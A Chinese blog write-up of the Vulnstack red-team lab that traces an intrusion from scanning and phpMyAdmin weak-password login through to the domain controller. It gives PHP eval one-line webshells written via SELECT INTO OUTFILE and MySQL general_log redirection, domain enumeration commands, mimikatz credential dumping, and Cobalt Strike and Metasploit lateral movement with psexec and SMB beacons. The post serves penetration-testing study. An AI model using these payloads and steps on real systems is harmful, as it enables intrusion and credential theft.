Vulnstack靶机学习一(上)

一、前言

     这个是红日的一个靶机,http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

  并未按照介绍里的点一个一个走,简单记录下过程。

  环境搭建:设置Win2K3 仅主机模式;winserver08 仅主机模式;win7添加一个网卡,一个设为仅主机模式,另一个设为NAT模式;攻击机设为NAT模式。

  登录win7,可能要修改密码。然后进入C:\phpStudy\文件下运行phpstudy.exe

  攻击机IP:192.168.157.137

二、信息搜集

  

nmap 192.168.157.0/24 -n -sP -sn

发现win7的IP为 192.168.157.138 ,探测开启的服务

nmap 192.168.157.138 -O -sS -sV -v

 

 

 访问http://192.168.157.138/发现是一个PHP探针,能看到绝对路径

 

对目录进行爆破

 

 

dirb http://192.168.157.138/

发现了http://192.168.157.138/phpmyadmin/index.php

 

 

 发现弱密码root/root进入后台

三、phpMyAdmin get shell

  1. 利用select into outfile 写入shell

先查看能否自定义导出文件目录的权限,结果为NULL意味着不允许导入导出数据到目录。且只能在my.ini进行配置。

SHOW VARIABLES LIKE "secure_file_priv";

 

 

 

 如果能将my.inisecure_file_prive并将其值设置为""或"/",并重启MySQL服务

select '<?php @eval($_POST[pass]);?>' into outfile 'c:/phpstudy/www/shell.php';

进行一句话写shell

  2. 利用日志写shell

查看全局变量 general_log、general_log_file

SHOW VARIABLES LIKE "general_log%";

 

 

 general_log 默认关闭,,general_log_file为日志储存路径。

写shell的思路:更改general_log的值,将日志储存在能访问的路径下,且后缀名为php。然后通过log日志进行写入一句话木马,然后再进一步利用。

set global general_log = "ON";
set global general_log_file = "C:/phpStudy/WWW/shell.php";

然后在日志中插入一句话

SELECT '<?php eval($_POST["pass"]);?>'

用蚁剑连接http://192.168.157.138/shell.php

 

 

 

 

四、内网信息搜集

利用蚁剑虚拟端进行信息搜集,发现在执行net view一些命令时无回显,利用CS生成木马,回连beacon。因为是靶机调整心跳为1s。

 

 

 记录常用的信息搜集命令,cs运行shell命令时需加 "shell 命令",eg: "shell net view"

ipconfig /all
net view
net view /domain
net time /domain
能够执行,说明此台机器在域中 (若是此命令在显示域处显示 WORKGROUP,则不存在域,若是报错:发生系统错误 5,则存在域,但该用户不是域用户)
net config workstation 查询当前的登录域与用户信息
net lookup “域名”  nslookup 命令直接解析域名服务器
net user /domain  查看当前域的所有用户
wmic useraccount get /all 获取域内用户的详细信息
net group "domain computers" /domain 查看所有域成员计算机列表
net group "domain admins" /domain 查看所有域控管理人员
net group "domain controllers" /domain 查看与控制管理器
net group "enterprise admins" /domain 查看企业管理组
net localgroup administrators /domain 查看域控,升级为域控时,本地账户也成为域管
net accounts /domain 获取域密码信息
nltest /domain_trusts 获取域信任列表

 

通过信息搜集知道了域控IP、域控管理员、域内其他计算机。然后利用svc-exe进行提权

 

 利用mimikatz抓取密码导出凭证

 

 

 五、横向移动

此时执行net view已经发现域控和另一台机器,利用导出的凭证能直接登录。

CS派生session给msf

现在msf监听,通讯类型要与cs保持一致

msf:

 

 

 cs:

 

 

 kali上面执行,连接session解释派生出来的会话

sessions
sessions -i 1

因为知道域控和另一台机器再192.168.52.0/24段

添加路由:

 

 

 尝试了MS17-010、MS08-067未果。到这只是记录下cs结合msf的运用,同理msf也可以派生session给cs。前面导出的凭证登录域内两台机器

创建一个bind_tcp的listener 针对目标机器点击psexec

 

但是在OWA用凭证登录的时候,发现不能连接上,怀疑被拦了。这里使用beacon SMB listener

SMB Beacon 使用命名管道通过父级 Beacon 进行通讯,当两个 Beacons 链接后,子 Beacon 从父 Beacon 获取到任务并发送。因为链接的 Beacons 使用 Windows 命名管道进行通信,此流量封装在 SMB 协议中,所以 SMB Beacon 相对隐蔽,绕防火墙时可能发挥奇效。

 

再次创建一个SMB listener ,从已有的beacon上面spwn,选择创建的listener

然后再登陆凭证,OWA上线。

 

posted @ 2020-07-20 03:28  你认识小哀吗  阅读(977)  评论(0编辑  收藏  举报